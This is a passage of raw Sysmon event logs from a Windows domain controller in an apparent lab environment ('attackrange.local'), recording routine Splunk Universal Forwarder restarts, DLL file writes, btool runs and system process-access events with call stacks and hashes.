Applicationsplunk ApplicationSplunk Inc.splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2316C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000003333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:12:01.597{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\wpcap.dll2021-01-14 13:12:01.597 11241100x80000000000000003332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:12:01.597{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\vcruntime140.dll2021-01-14 13:12:01.597 11241100x80000000000000003331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:12:01.597{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\vccorlib140.dll2021-01-14 13:12:01.597 11241100x80000000000000003330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localEXE2021-01-14 13:12:01.472{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe2021-01-14 13:12:01.472 11241100x80000000000000003329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:12:01.441{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmprotocols.dll2021-01-14 13:12:01.441 11241100x80000000000000003328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:12:01.441{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmframework.dll2021-01-14 13:12:01.441 11241100x80000000000000003327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:12:01.441{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmflow.dll2021-01-14 13:12:01.441 11241100x80000000000000003326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.441{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys2021-01-14 13:12:01.441 11241100x80000000000000003325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:12:01.425{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\msvcp140.dll2021-01-14 13:12:01.425 11241100x80000000000000003324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:12:01.425{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\concrt140.dll2021-01-14 13:12:01.425 11241100x80000000000000003323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:12:01.425{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\Packet.dll2021-01-14 13:12:01.425 10341000x80000000000000003479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.552{08A6967A-4322-6000-AF00-000000009A01}50205048C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.302{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4322-6000-AF00-000000009A01}5020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.302{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.302{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.302{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.302{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.302{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.302{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.302{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.302{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4322-6000-AF00-000000009A01}5020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.302{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.302{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.302{08A6967A-4322-6000-AE00-000000009A01}50285076C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-4322-6000-AF00-000000009A01}5020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.307{08A6967A-4322-6000-AF00-000000009A01}5020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4322-6000-AE00-000000009A01}5028C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000003465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.302{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4322-6000-AE00-000000009A01}5028C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.